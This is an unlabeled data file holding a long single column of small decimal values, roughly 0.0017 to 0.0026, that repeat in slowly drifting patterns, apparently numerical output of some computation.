0.00173598
0.00172712
0.00172492
0.00173601
0.001738
0.001725
0.00174264
0.00175586
0.00175586
0.00174262
0.00174277
0.00175382
0.00175581
0.00174488
0.00175577
0.0017449
0.00174269
0.00174264
0.00175586
0.00175586
0.00174263
0.00173795
0.00173598
0.00172491
0.00172711
0.00173799
0.001736
0.00172499
0.00173803
0.00172485
0.00173804
0.00172486
0.00173795
0.00173598
0.00172711
0.00172491
0.001736
0.00173799
0.00172499
0.00173803
0.00172485
0.00173804
0.00172486
0.00175587
0.00175586
0.00174327
0.00174264
0.00174263
0.00175586
0.00174262
0.00172485
0.00173805
0.00173755
0.00172486
0.00172485
0.00173805
0.00173805
0.00172485
0.00173805
0.00174278
0.00175382
0.00175581
0.00174488
0.00175578
0.0017449
0.00174269
0.00174264
0.00175586
0.00175586
0.00174263
0.00174264
0.00175586
0.00175586
0.00174262
0.00173795
0.00173598
0.00172712
0.00172492
0.001736
0.001738
0.001725
0.00173796
0.00173598
0.00172712
0.00172491
0.001736
0.00173799
0.00172499
0.00173804
0.00172485
0.00173804
0.00172486
0.00173804
0.00172484
0.00173804
0.00172486
0.00175586
0.00174262
0.00175586
0.00174262
0.00173755
0.00172485
0.00172485
0.00173804
0.00173804
0.00172484
0.00173804
0.00172484
0.00173804
0.00172028
0.00170712
0.00172028
0.00170711
0.00172028
0.00172028
0.00170774
0.00170713
0.00170712
0.00168942
0.00170256
0.00168942
0.00170256
0.00170206
0.00168943
0.00168943
0.00170256
0.00170256
0.00170713
0.00172027
0.00172027
0.00170711
0.00170726
0.00172023
0.00171824
0.00170934
0.00172019
0.00170718
0.00170937
0.00170726
0.00172023
0.00171823
0.00170935
0.00172019
0.00170717
0.00170937
0.00170254
0.00168942
0.00170255
0.00168944
0.00170254
0.00168942
0.00170255
0.00168944
0.00170246
0.00170049
0.00168949
0.00169167
0.00170251
0.00170052
0.00168956
0.00170246
0.00170049
0.00168948
0.00169167
0.0017025
0.00170052
0.00168956
0.00172028
0.00172028
0.00170774
0.00170711
0.00170711
0.00172028
0.00170711
0.00168941
0.00170255
0.00170206
0.00168942
0.00168942
0.00170255
0.00170255
0.00168941
0.00170255
0.00170727
0.00172023
0.00171824
0.00170935
0.00172019
0.00170718
0.00170938
0.00170714
0.00172028
0.00172028
0.00170712
0.00170727
0.00171824
0.00172024
0.00170935
0.0017202
0.00170938
0.00170719
0.00170255
0.00168942
0.00170255
0.00168944
0.00170247
0.00170049
0.00168949
0.00169167
0.00170251
0.00170052
0.00168957
0.00170256
0.00168943
0.00170256
0.00168944
0.00170248
0.0017005
0.00169167
0.00168949
0.00170052
0.00170251
0.00168957
0.00170713
0.00172027
0.00172027
0.00170711
0.00170726
0.00171824
0.00172023
0.00170935
0.00172019
0.00170937
0.00170718
0.00170713
0.00172027
0.00172027
0.00170711
0.00170245
0.00170049
0.00168948
0.00169167
0.0017025
0.00170052
0.00168956
0.00170254
0.00168942
0.00170255
0.00168944
0.00170246
0.00170049
0.00169166
0.00168949
0.00170051
0.0017025
0.00168956
0.00170254
0.00168942
0.00170255
0.00168944
0.00172029
0.00172028
0.00170775
0.00170712
0.00170712
0.00172028
0.00170711
0.00168942
0.00170256
0.00170206
0.00168943
0.00168943
0.00170256
0.00170256
0.00168942
0.00170256
0.00170726
0.00171824
0.00172023
0.00170935
0.00172018
0.00170938
0.00170718
0.00170713
0.00172028
0.00172027
0.00170712
0.00170713
0.00172027
0.00172027
0.00170711
0.00170247
0.0017005
0.00169167
0.00168949
0.00170052
0.0017025
0.00168957
0.00170246
0.00170049
0.00169167
0.00168949
0.00170052
0.00170251
0.00168957
0.00170255
0.00168943
0.00170255
0.00168944
0.00170255
0.00168942
0.00170255
0.00168944
0.00172028
0.00170711
0.00172028
0.00170711
0.00170206
0.00168942
0.00168942
0.00170256
0.00170256
0.00168942
0.00170256
0.00168942
0.00170256
0.00168487
0.00167176
0.00168488
0.00167176
0.00168487
0.00168487
0.00167239
0.00167177
0.00167177
0.00166722
0.00166723
0.00166672
0.00166722
0.00166723
0.00167178
0.00168487
0.00168486
0.00167176
0.0016719
0.00168482
0.00168283
0.00167398
0.00168477
0.00167183
0.001674
0.0016719
0.00168482
0.00168283
0.00167397
0.00168478
0.00167183
0.001674
0.00166722
0.00166516
0.00166717
0.00168487
0.00168487
0.00167238
0.00167177
0.00167176
0.00168487
0.00167176
0.0016719
0.00168482
0.00168283
0.00167398
0.00168478
0.00167183
0.001674
0.00167178
0.00168487
0.00168487
0.00167177
0.0016719
0.00168283
0.00168483
0.00167398
0.00168479
0.001674
0.00167183
0.00166722
0.00166722
0.00166713
0.00166516
0.00166718
0.00166517
0.00166722
0.00166722
0.00166712
0.00166516
0.00166518
0.00166717
0.00167178
0.00168487
0.00168486
0.00167176
0.0016719
0.00168283
0.00168482
0.00167397
0.00168478
0.001674
0.00167183
0.00167178
0.00168487
0.00168486
0.00167176
0.00168488
0.00168488
0.00167238
0.00167177
0.00167177
0.00168488
0.00167176
0.00166723
0.00166672
0.00166723
0.00166723
0.00166723
0.0016719
0.00168283
0.00168482
0.00167397
0.00168479
0.001674
0.00167183
0.00167178
0.00168487
0.00168487
0.00167177
0.00167178
0.00168487
0.00168487
0.00167176
0.00166515
0.00166718
0.00166722
0.00168487
0.00167176
0.00168488
0.00167176
0.0025751
0.00257035
0.00257043
0.00257516
0.0025751
0.00257515
0.00257034
0.00258021
0.00258023
0.00258502
0.00258025
0.00258497
0.00257509
0.00257037
0.00257509
0.00257513
0.00257033
0.00258022
0.00258034
0.00258499
0.00258503
0.00258023
0.00258031
0.00258499
0.0025802
0.00257507
0.0025751
0.00257043
0.00257035
0.00257516
0.00257514
0.0025751
0.00257034
0.0025802
0.00258023
0.00258502
0.00258025
0.00258497
0.00257509
0.00257037
0.00257509
0.00257513
0.00257033
0.00258022
0.00258033
0.00258503
0.00258499
0.00258031
0.00258023
0.00258499
0.0025802
0.00257507
0.00257512
0.00257029
0.00257029
0.00257506
0.00257506
0.00257034
0.00258034
0.00258504
0.00258027
0.00258495
0.00258043
0.00258022
0.002585
0.00258034
0.00258504
0.00258027
0.00258495
0.00258043
0.00258022
0.002585
0.00257512
0.00257034
0.00257512
0.00257055
0.00257515
0.00257507
0.00257046
0.00257512
0.00257034
0.00257511
0.00257055
0.00257515
0.00257507
0.00257046
0.00258022
0.00258494
0.00258494
0.00258016
0.00258016
0.00258501
0.0025357
0.00253575
0.00253097
0.00253104
0.0025357
0.00253574
0.00253096
0.00254077
0.00254556
0.0025408
0.00254552
0.00254082
0.00254079
0.00254089
0.00254553
0.00254557
0.00254553
0.00254079
0.00254087
0.00253569
0.00253099
0.00253569
0.00253573
0.00253095
0.00254077
0.00253567
0.0025357
0.00253575
0.00253104
0.00253097
0.00253574
0.0025357
0.00253096
0.00254077
0.00254556
0.0025408
0.00254552
0.00254082
0.00254079
0.00254089
0.00254557
0.00254553
0.00254553
0.00254087
0.00254079
0.00253569
0.00253099
0.00253569
0.00253573
0.00253095
0.00254077
0.00253567
0.00253572
0.00253091
0.00253091
0.00253566
0.00253566
0.00253096
0.0025409
0.00254557
0.00254549
0.00254083
0.00254554
0.00254099
0.00254079
0.0025409
0.00254557
0.00254549
0.00254083
0.00254554
0.00254099
0.00254079
0.00254079
0.00254549
0.00254549
0.00254555
0.00254073
0.00254073
0.00253571
0.00253096
0.00253571
0.00253117
0.00253574
0.00253566
0.00253107
0.00253571
0.00253096
0.00253571
0.00253117
0.00253574
0.00253566
0.00253107
0.00249652
0.00249656
0.00249181
0.00249188
0.00249652
0.00249655
0.0024918
0.00250156
0.00250632
0.00250158
0.00250628
0.0025016
0.00250157
0.00250167
0.0025063
0.00250633
0.00250629
0.00250158
0.00250165
0.00249651
0.00249183
0.00249651
0.00249654
0.00249179
0.00250156
0.00249649
0.00249652
0.00249656
0.00249188
0.00249181
0.00249655
0.00249652
0.0024918
0.00250156
0.00250632
0.00250158
0.00250628
0.0025016
0.00250157
0.00250167
0.00250633
0.0025063
0.00250629
0.00250165
0.00250158
0.00249651
0.00249183
0.00249651
0.00249654
0.00249179
0.00250156
0.00249649
0.00249653
0.00249175
0.00249175
0.00249648
0.00249648
0.0024918
0.00250168
0.00250633
0.00250626
0.00250161
0.0025063
0.00250177
0.00250157
0.00250168
0.00250633
0.00250626
0.00250161
0.0025063
0.00250177
0.00250157
0.00250157
0.00250625
0.00250625
0.00250631
0.00250152
0.00250152
0.00249652
0.0024918
0.00249653
0.002492
0.00249655
0.00249648
0.00249191
0.00249652
0.0024918
0.00249653
0.002492
0.00249655
0.00249648
0.00249191
0.00245755
0.00245759
0.00245286
0.00245293
0.00245755
0.00245758
0.00245286
0.00246256
0.0024673
0.00246258
0.00246726
0.0024626
0.00246257
0.00246267
0.00246728
0.0024673
0.00246727
0.00246258
0.00246265
0.00245754
0.00245288
0.00245754
0.00245757
0.00245285
0.00246256
0.00245753
0.00245755
0.00245759
0.00245293
0.00245286
0.00245758
0.00245755
0.00245286
0.00246256
0.0024673
0.00246258
0.00246726
0.0024626
0.00246257
0.00246267
0.0024673
0.00246727
0.00246727
0.00246264
0.00246258
0.00245754
0.00245288
0.00245754
0.00245757
0.00245285
0.00246256
0.00245753
0.00245756
0.00245281
0.00245281
0.00245751
0.00245751
0.00245285
0.00246267
0.0024673
0.00246724
0.00246261
0.00246727
0.00246277
0.00246257
0.00246267
0.0024673
0.00246724
0.00246261
0.00246727
0.00246277
0.00246257
0.00246257
0.00246724
0.00246724
0.00246729
0.00246253
0.00246253
0.00245755
0.00245286
0.00245755
0.00245305
0.00245758
0.00245751
0.00245295
0.00245755
0.00245285
0.00245755
0.00245305
0.00245758
0.00245751
0.00245295
0.00241878
0.00241882
0.00241412
0.00241418
0.00241879
0.00241881
0.00241411
0.00242377
0.00242848
0.00242379
0.00242845
0.0024238
0.00242378
0.00242387
0.00242846
0.00242848
0.00242846
0.00242379
0.00242385
0.00241878
0.00241414
0.00241877
0.00241881
0.0024141
0.00242376
0.00241876
0.00241878
0.00241882
0.00241418
0.00241412
0.00241881
0.00241879
0.00241411
0.00242377
0.00242848
0.00242379
0.00242845
0.0024238
0.00242378
0.00242387
0.00242848
0.00242846
0.00242846
0.00242385
0.00242379
0.00241878
0.00241413
0.00241877
0.00241881
0.0024141
0.00242377
0.00241876
0.0024188
0.00241407
0.00241407
0.00241875
0.00241875
0.0024141
0.00242387
0.00242848
0.00242842
0.00242381
0.00242845
0.00242397
0.00242378
0.00242387
0.00242848
0.00242842
0.00242381
0.00242845
0.00242397
0.00242378
0.00242377
0.00242842
0.00242842
0.00242847
0.00242373
0.00242373
0.00241878
0.00241411
0.00241879
0.0024143
0.00241881
0.00241875
0.0024142
0.00241878
0.00241411
0.00241879
0.0024143
0.00241881
0.00241875
0.0024142
0.00238022
0.00238025
0.00237557
0.00237563
0.00238022
0.00238024
0.00237556
0.00238518
0.00238986
0.00238519
0.00238983
0.00238521
0.00238518
0.00238527
0.00238984
0.00238986
0.00238984
0.00238519
0.00238525
0.00238021
0.00237559
0.0023802
0.00238024
0.00237556
0.00238517
0.0023802
0.00238022
0.00238025
0.00237563
0.00237557
0.00238024
0.00238022
0.00237556
0.00238518
0.00238986
0.00238519
0.00238983
0.0023852
0.00238518
0.00238527
0.00238986
0.00238984
0.00238984
0.00238525
0.00238519
0.00238021
0.00237559
0.0023802
0.00238024
0.00237556
0.00238517
0.0023802
0.00238023
0.00237552
0.00237552
0.00238018
0.00238018
0.00237556
0.00238527
0.00238986
0.00238981
0.00238521
0.00238983
0.00238536
0.00238518
0.00238527
0.00238986
0.00238981
0.00238521
0.00238983
0.00238536
0.00238518
0.00238518
0.00238981
0.00238981
0.00238985
0.00238514
0.00238514
0.00238021
0.00237556
0.00238022
0.00237574
0.00238023
0.00238018
0.00237565
0.00238021
0.00237556
0.00238022
0.00237574
0.00238023
0.00238018
0.00237565
0.00234184
0.00234187
0.00233721
0.00233726
0.00234184
0.00234186
0.00233721
0.00234677
0.00235144
0.00234679
0.00235141
0.0023468
0.00234678
0.00234686
0.00235142
0.00235144
0.00235142
0.00234679
0.00234684
0.00234183
0.00233723
0.00234183
0.00234186
0.0023372
0.00234677
0.00234182
0.00234184
0.00234187
0.00233726
0.00233721
0.00234186
0.00234184
0.00233721
0.00234677
0.00235144
0.00234679
0.00235141
0.0023468
0.00234678
0.00234686
0.00235144
0.00235142
0.00235142
0.00234684
0.00234679
0.00234183
0.00233722
0.00234183
0.00234186
0.0023372
0.00234677
0.00234182
0.00234185
0.00233717
0.00233717
0.00234181
0.00234181
0.0023372
0.00234686
0.00235143
0.00235138
0.00234681
0.00235141
0.00234695
0.00234678
0.00234686
0.00235143
0.00235138
0.0023468
0.00235141
0.00234695
0.00234678
0.00234677
0.00235139
0.00235139
0.00235143
0.00234674
0.00234674
0.00234183
0.0023372
0.00234184
0.00233738
0.00234185
0.0023418
0.00233729
0.00234183
0.0023372
0.00234184
0.00233738
0.00234185
0.0023418
0.00233729
0.00230364
0.00230367
0.00229903
0.00229908
0.00230364
0.00230366
0.00229902
0.00230855
0.00231319
0.00230856
0.00231317
0.00230857
0.00230855
0.00230863
0.00231318
0.00231319
0.00231317
0.00230856
0.00230861
0.00230363
0.00229904
0.00230363
0.00230366
0.00229902
0.00230854
0.00230362
0.00230364
0.00230367
0.00229908
0.00229903
0.00230366
0.00230364
0.00229903
0.00230855
0.00231319
0.00230856
0.00231317
0.00230857
0.00230855
0.00230863
0.00231319
0.00231318
0.00231317
0.00230861
0.00230856
0.00230363
0.00229904
0.00230363
0.00230366
0.00229902
0.00230854
0.00230362
0.00230365
0.00229899
0.00229899
0.00230361
0.00230361
0.00229902
0.00230864
0.00231318
0.00231314
0.00230858
0.00231316
0.00230872
0.00230855
0.00230863
0.00231318
0.00231314
0.00230858
0.00231316
0.00230872
0.00230855
0.00230855
0.00231314
0.00231314
0.00231318
0.00230852
0.00230852
0.00230363
0.00229902
0.00230364
0.00229919
0.00230365
0.00230361
0.0022991
0.00230363
0.00229902
0.00230364
0.00229919
0.00230365
0.00230361
0.0022991
0.00226561
0.00226563
0.00226102
0.00226107
0.00226561
0.00226562
0.00226101
0.0022705
0.00227512
0.00227051
0.0022751
0.00227052
0.0022705
0.00227057
0.0022751
0.00227512
0.0022751
0.00227051
0.00227055
0.0022656
0.00226103
0.0022656
0.00226563
0.00226101
0.00227049
0.00226559
0.00226561
0.00226563
0.00226107
0.00226102
0.00226562
0.00226561
0.00226101
0.00227049
0.00227512
0.00227051
0.0022751
0.00227052
0.0022705
0.00227057
0.00227512
0.0022751
0.0022751
0.00227055
0.00227051
0.0022656
0.00226103
0.0022656
0.00226563
0.00226101
0.00227049
0.00226559
0.00226562
0.00226098
0.00226098
0.00226558
0.00226558
0.002261
0.00227058
0.00227511
0.00227507
0.00227052
0.00227509
0.00227066
0.0022705
0.00227058
0.00227511
0.00227507
0.00227052
0.00227509
0.00227066
0.0022705
0.00227049
0.00227508
0.00227508
0.00227511
0.00227047
0.00227047
0.0022656
0.00226101
0.00226561
0.00226117
0.00226561
0.00226558
0.00226109
0.0022656
0.00226101
0.00226561
0.00226117
0.00226561
0.00226558
0.00226109
0.00222773
0.00222776
0.00222316
0.0022232
0.00222774
0.00222775
0.00222315
0.0022326
0.0022372
0.00223261
0.00223718
0.00223262
0.0022326
0.00223267
0.00223719
0.0022372
0.00223719
0.00223261
0.00223266
0.00222773
0.00222317
0.00222772
0.00222775
0.00222315
0.00223259
0.00222772
0.00222773
0.00222776
0.0022232
0.00222316
0.00222775
0.00222774
0.00222315
0.0022326
0.00223721
0.00223261
0.00223718
0.00223262
0.0022326
0.00223267
0.0022372
0.00223719
0.00223719
0.00223266
0.00223261
0.00222773
0.00222317
0.00222772
0.00222775
0.00222315
0.00223259
0.00222772
0.00222774
0.00222312
0.00222312
0.00222771
0.00222771
0.00222314
0.00223268
0.00223719
0.00223716
0.00223263
0.00223718
0.00223276
0.0022326
0.00223268
0.00223719
0.00223716
0.00223263
0.00223718
0.00223276
0.0022326
0.0022326
0.00223717
0.00223717
0.0022372
0.00223257
0.00223257
0.00222772
0.00222315
0.00222773
0.00222331
0.00222773
0.0022277
0.00222323
0.00222772
0.00222315
0.00222773
0.00222331
0.00222773
0.00222771
0.00222323
0.00219
0.00219002
0.00218544
0.00218548
0.00219
0.00219001
0.00218543
0.00219484
0.00219943
0.00219486
0.00219942
0.00219486
0.00219485
0.00219491
0.00219942
0.00219943
0.00219942
0.00219486
0.0021949
0.00218999
0.00218544
0.00218998
0.00219001
0.00218542
0.00219484
0.00218998
0.00219
0.00219002
0.00218548
0.00218544
0.00219001
0.00219
0.00218543
0.00219484
0.00219943
0.00219486
0.00219942
0.00219486
0.00219485
0.00219491
0.00219943
0.00219942
0.00219942
0.0021949
0.00219486
0.00218999
0.00218544
0.00218998
0.00219001
0.00218543
0.00219484
0.00218998
0.00219001
0.0021854
0.0021854
0.00218998
0.00218998
0.00218542
0.00219492
0.00219942
0.00219939
0.00219487
0.00219941
0.002195
0.00219485
0.00219492
0.00219941
0.00219939
0.00219487
0.0021994
0.002195
0.00219485
0.00219484
0.0021994
0.0021994
0.00219943
0.00219482
0.00219482
0.00218998
0.00218543
0.00219
0.00218558
0.00218999
0.00218997
0.0021855
0.00218998
0.00218543
0.00219
0.00218558
0.00218999
0.00218997
0.0021855
0.00215238
0.0021524
0.00214783
0.00214787
0.00215238
0.00215239
0.00214782
0.00215721
0.00216179
0.00215722
0.00216177
0.00215723
0.00215721
0.00215728
0.00216178
0.00216178
0.00216177
0.00215722
0.00215726
0.00215237
0.00214784
0.00215236
0.00215239
0.00214782
0.0021572
0.00215236
0.00215238
0.0021524
0.00214787
0.00214783
0.00215239
0.00215238
0.00214782
0.00215721
0.00216179
0.00215722
0.00216177
0.00215723
0.00215721
0.00215728
0.00216178
0.00216178
0.00216177
0.00215726
0.00215722
0.00215237
0.00214784
0.00215236
0.00215239
0.00214782
0.0021572
0.00215236
0.00215239
0.00214779
0.00214779
0.00215236
0.00215236
0.00214781
0.00215728
0.00216176
0.00216175
0.00215723
0.00216176
0.00215736
0.00215721
0.00215728
0.00216177
0.00216175
0.00215723
0.00216176
0.00215736
0.00215721
0.00215721
0.00216175
0.00216175
0.00216178
0.00215718
0.00215718
0.00215236
0.00214782
0.00215238
0.00214797
0.00215237
0.00215235
0.00214789
0.00215236
0.00214782
0.00215238
0.00214797
0.00215237
0.00215235
0.00214789
0.00211486
0.00211487
0.00211031
0.00211035
0.00211486
0.00211487
0.00211031
0.00211967
0.00212424
0.00211969
0.00212423
0.00211969
0.00211968
0.00211974
0.00212423
0.00212424
0.00212423
0.00211969
0.00211972
0.00211485
0.00211032
0.00211484
0.00211487
0.0021103
0.00211967
0.00211484
0.00211486
0.00211487
0.00211035
0.00211032
0.00211487
0.00211486
0.00211031
0.00211967
0.00212424
0.00211969
0.00212423
0.00211969
0.00211968
0.00211974
0.00212424
0.00212423
0.00212423
0.00211972
0.00211969
0.00211485
0.00211032
0.00211484
0.00211487
0.0021103
0.00211967
0.00211484
0.00211486
0.00211028
0.00211028
0.00211484
0.00211484
0.0021103
0.00211975
0.00212422
0.0021242
0.0021197
0.00212421
0.00211982
0.00211968
0.00211975
0.00212422
0.0021242
0.0021197
0.00212421
0.00211982
0.00211968
0.00211967
0.00212421
0.00212421
0.00212424
0.00211965
0.00211965
0.00211484
0.00211031
0.00211486
0.00211045
0.00211484
0.00211483
0.00211038
0.00211484
0.00211031
0.00211486
0.00211045
0.00211484
0.00211483
0.00211038
0.00207742
0.00207743
0.00207288
0.00207292
0.00207742
0.00207742
0.00207287
0.00208222
0.00208678
0.00208223
0.00208676
0.00208224
0.00208222
0.00208228
0.00208677
0.00208678
0.00208677
0.00208223
0.00208227
0.00207741
0.00207289
0.0020774
0.00207743
0.00207287
0.00208222
0.0020774
0.00207741
0.00207743
0.00207292
0.00207288
0.00207742
0.00207742
0.00207287
0.00208222
0.00208678
0.00208223
0.00208676
0.00208224
0.00208223
0.00208228
0.00208678
0.00208677
0.00208677
0.00208227
0.00208223
0.00207741
0.00207289
0.0020774
0.00207743
0.00207287
0.00208222
0.0020774
0.00207742
0.00207284
0.00207284
0.0020774
0.0020774
0.00207286
0.00208229
0.00208675
0.00208674
0.00208225
0.00208675
0.00208236
0.00208223
0.00208229
0.00208675
0.00208674
0.00208225
0.00208675
0.00208236
0.00208223
0.00208222
0.00208675
0.00208675
0.00208678
0.0020822
0.0020822
0.0020774
0.00207287
0.00207742
0.00207301
0.0020774
0.00207739
0.00207294
0.0020774
0.00207287
0.00207742
0.00207301
0.0020774
0.00207739
0.00207294
0.00204005
0.00204006
0.00203552
0.00203555
0.00204005
0.00204005
0.00203551
0.00204484
0.00204939
0.00204485
0.00204938
0.00204486
0.00204484
0.0020449
0.00204938
0.00204939
0.00204938
0.00204485
0.00204489
0.00204004
0.00203552
0.00204003
0.00204006
0.00203551
0.00204484
0.00204003
0.00204005
0.00204006
0.00203555
0.00203552
0.00204005
0.00204005
0.00203551
0.00204484
0.00204939
0.00204485
0.00204938
0.00204486
0.00204484
0.0020449
0.00204939
0.00204938
0.00204938
0.00204489
0.00204485
0.00204004
0.00203552
0.00204003
0.00204006
0.00203551
0.00204484
0.00204003
0.00204005
0.00203548
0.00203548
0.00204003
0.00204003
0.0020355
0.00204491
0.00204936
0.00204936
0.00204486
0.00204936
0.00204498
0.00204485
0.00204491
0.00204936
0.00204936
0.00204486
0.00204936
0.00204498
0.00204485
0.00204484
0.00204936
0.00204936
0.00204939
0.00204482
0.00204482
0.00204003
0.00203551
0.00204004
0.00203564
0.00204002
0.00204002
0.00203557
0.00204003
0.00203551
0.00204005
0.00203564
0.00204002
0.00204002
0.00203557
0.00200275
0.00200277
0.00199824
0.00199827
0.00200276
0.00200276
0.00199823
0.00200753
0.00201208
0.00200755
0.00201206
0.00200755
0.00200754
0.0020076
0.00201207
0.00201208
0.00201207
0.00200755
0.00200758
0.00200275
0.00199824
0.00200274
0.00200277
0.00199822
0.00200753
0.00200274
0.00200275
0.00200277
0.00199827
0.00199824
0.00200276
0.00200276
0.00199823
0.00200754
0.00201208
0.00200755
0.00201206
0.00200755
0.00200754
0.0020076
0.00201208
0.00201207
0.00201207
0.00200758
0.00200755
0.00200275
0.00199824
0.00200274
0.00200277
0.00199822
0.00200753
0.00200274
0.00200276
0.0019982
0.0019982
0.00200274
0.00200274
0.00199822
0.0020076
0.00201204
0.00201205
0.00200756
0.00201205
0.00200767
0.00200754
0.0020076
0.00201204
0.00201205
0.00200756
0.00201205
0.00200767
0.00200754
0.00200753
0.00201205
0.00201205
0.00201208
0.00200751
0.00200751
0.00200274
0.00199823
0.00200275
0.00199835
0.00200273
0.00200273
0.00199829
0.00200274
0.00199823
0.00200275
0.00199835
0.00200273
0.00200273
0.00199829
0.00196556
0.00196557
0.00196106
0.00196109
0.00196557
0.00196557
0.00196105
0.00197033
0.00197486
0.00197034
0.00197485
0.00197035
0.00197033
0.00197038
0.00197485
0.00197485
0.00197485
0.00197034
0.00197037
0.00196556
0.00196106
0.00196555
0.00196557
0.00196105
0.00197033
0.00196555
0.00196556
0.00196557
0.00196109
0.00196106
0.00196557
0.00196557
0.00196105
0.00197033
0.00197486
0.00197034
0.00197485
0.00197035
0.00197033
0.00197039
0.00197486
0.00197485
0.00197485
0.00197037
0.00197034
0.00196556
0.00196106
0.00196555
0.00196558
0.00196105
0.00197033
0.00196555
0.00196557
0.00196102
0.00196103
0.00196555
0.00196555
0.00196104
0.00197039
0.00197482
0.00197483
0.00197035
0.00197483
0.00197046
0.00197034
0.00197039
0.00197482
0.00197483
0.00197035
0.00197483
0.00197045
0.00197034
0.00197032
0.00197483
0.00197483
0.00197486
0.00197031
0.00197031
0.00196554
0.00196105
0.00196556
0.00196117
0.00196553
0.00196554
0.00196111
0.00196554
0.00196105
0.00196556
0.00196117
0.00196553
0.00196554
0.00196111
0.00192851
0.00192851
0.00192402
0.00192405
0.00192851
0.00192851
0.00192401
0.00193325
0.00193777
0.00193326
0.00193775
0.00193327
0.00193325
0.0019333
0.00193776
0.00193776
0.00193776
0.00193326
0.00193329
0.0019285
0.00192402
0.00192849
0.00192851
0.00192401
0.00193325
0.00192849
0.00192851
0.00192851
0.00192404
0.00192401
0.00192851
0.00192851
0.00192401
0.00193325
0.00193777
0.00193326
0.00193775
0.00193327
0.00193325
0.0019333
0.00193776
0.00193776
0.00193776
0.00193329
0.00193326
0.0019285
0.00192402
0.00192849
0.00192852
0.00192401
0.00193325
0.00192849
0.00192852
0.00192399
0.00192399
0.0019285
0.0019285
0.00192401
0.00193331
0.00193772
0.00193774
0.00193327
0.00193773
0.00193337
0.00193326
0.00193331
0.00193772
0.00193774
0.00193328
0.00193773
0.00193337
0.00193326
0.00193325
0.00193774
0.00193774
0.00193776
0.00193323
0.00193323
0.00192849
0.00192402
0.00192851
0.00192413
0.00192847
0.00192849
0.00192407
0.00192849
0.00192402
0.00192851
0.00192413
0.00192847
0.00192849
0.00192407
0.00189163
0.00189164
0.00188717
0.0018872
0.00189164
0.00189163
0.00188717
0.00189635
0.00190084
0.00189636
0.00190083
0.00189636
0.00189635
0.0018964
0.00190083
0.00190083
0.00190083
0.00189636
0.00189639
0.00189163
0.00188717
0.00189162
0.00189164
0.00188716
0.00189635
0.00189162
0.00189163
0.00189164
0.0018872
0.00188717
0.00189163
0.00189163
0.00188717
0.00189635
0.00190084
0.00189636
0.00190083
0.00189636
0.00189635
0.0018964
0.00190083
0.00190083
0.00190083
0.00189639
0.00189636
0.00189163
0.00188717
0.00189162
0.00189164
0.00188716
0.00189635
0.00189162
0.00189165
0.00188715
0.00188715
0.00189163
0.00189163
0.00188717
0.00189642
0.0019008
0.00190082
0.00189638
0.00190081
0.00189647
0.00189637
0.00189642
0.0019008
0.00190082
0.00189638
0.00190081
0.00189647
0.00189637
0.00189635
0.00190082
0.00190082
0.00190084
0.00189634
0.00189634
0.00189162
0.00188718
0.00189164
0.00188728
0.0018916
0.00189162
0.00188723
0.00189162
0.00188718
0.00189164
0.00188728
0.0018916
0.00189162
0.00188723
0.00185502
0.00185502
0.00185059
0.00185062
0.00185502
0.00185502
0.00185059
0.0018597
0.00186415
0.00185971
0.00186415
0.00185971
0.0018597
0.00185974
0.00186415
0.00186414
0.00186415
0.00185971
0.00185973
0.00185502
0.00185059
0.00185501
0.00185503
0.00185058
0.0018597
0.001855
0.00185502
0.00185502
0.00185061
0.00185059
0.00185502
0.00185502
0.00185058
0.0018597
0.00186415
0.00185971
0.00186414
0.00185971
0.0018597
0.00185974
0.00186414
0.00186415
0.00186415
0.00185973
0.00185971
0.00185502
0.00185059
0.00185501
0.00185503
0.00185058
0.0018597
0.00185501
0.00185504
0.00185058
0.00185058
0.00185502
0.00185502
0.00185059
0.00185977
0.00186411
0.00186414
0.00185973
0.00186413
0.00185982
0.00185972
0.00185976
0.00186412
0.00186414
0.00185973
0.00186413
0.00185982
0.00185972
0.0018597
0.00186415
0.00186415
0.00186416
0.0018597
0.0018597
0.00185501
0.0018506
0.00185503
0.0018507
0.00185499
0.00185501
0.00185065
0.001855
0.0018506
0.00185503
0.0018507
0.00185499
0.00185501
0.00185065
0.00181872
0.00181871
0.00181432
0.00181434
0.00181872
0.00181871
0.00181432
0.00182335
0.00182777
0.00182336
0.00182776
0.00182336
0.00182336
0.00182339
0.00182776
0.00182776
0.00182776
0.00182336
0.00182338
0.00181872
0.00181432
0.0018187
0.00181872
0.00181432
0.00182336
0.00181871
0.00181871
0.0018187
0.00181434
0.00181432
0.0018187
0.00181871
0.00181431
0.00182335
0.00182777
0.00182336
0.00182776
0.00182336
0.00182335
0.00182339
0.00182775
0.00182776
0.00182776
0.00182338
0.00182336
0.00181871
0.00181432
0.0018187
0.00181872
0.00181431
0.00182335
0.0018187
0.00181872
0.0018143
0.0018143
0.00181871
0.00181871
0.00181431
0.00182341
0.00182772
0.00182775
0.00182337
0.00182774
0.00182346
0.00182337
0.00182341
0.00182772
0.00182775
0.00182337
0.00182774
0.00182346
0.00182337
0.00182335
0.00182776
0.00182776
0.00182777
0.00182334
0.00182334
0.00181869
0.00181432
0.00181871
0.00181442
0.00181867
0.0018187
0.00181437
0.00181869
0.00181432
0.00181871
0.00181442
0.00181867
0.0018187
0.00181437
0.00178271
0.0017827
0.00177835
0.00177837
0.00178271
0.0017827
0.00177834
0.00178731
0.00179168
0.00178732
0.00179168
0.00178731
0.00178731
0.00178734
0.00179168
0.00179167
0.00179168
0.00178731
0.00178733
0.00178271
0.00177835
0.0017827
0.00178271
0.00177834
0.00178731
0.0017827
0.00178271
0.0017827
0.00177836
0.00177835
0.0017827
0.0017827
0.00177834
0.00178731
0.00179168
0.00178732
0.00179168
0.00178731
0.00178731
0.00178734
0.00179167
0.00179168
0.00179168
0.00178733
0.00178731
0.00178271
0.00177835
0.0017827
0.00178271
0.00177834
0.00178731
0.0017827
0.00178271
0.00177833
0.00177833
0.0017827
0.0017827
0.00177833
0.00178735
0.00179163
0.00179166
0.00178732
0.00179165
0.0017874
0.00178731
0.00178735
0.00179163
0.00179166
0.00178732
0.00179165
0.0017874
0.00178731
0.0017873
0.00179167
0.00179167
0.00179168
0.00178729
0.00178729
0.00178267
0.00177835
0.0017827
0.00177843
0.00178265
0.00178269
0.00177838
0.00178267
0.00177834
0.0017827
0.00177843
0.00178265
0.00178269
0.00177838
0.00174696
0.00174694
0.00174262
0.00174264
0.00174696
0.00174694
0.00174262
0.00175153
0.00175588
0.00175154
0.00175587
0.00175153
0.00175153
0.00175156
0.00175587
0.00175586
0.00175587
0.00175153
0.00175155
0.00174696
0.00174262
0.00174694
0.00174696
0.00174262
0.00175153
0.00174695
0.00174696
0.00174695
0.00174264
0.00174262
0.00174695
0.00174696
0.00174262
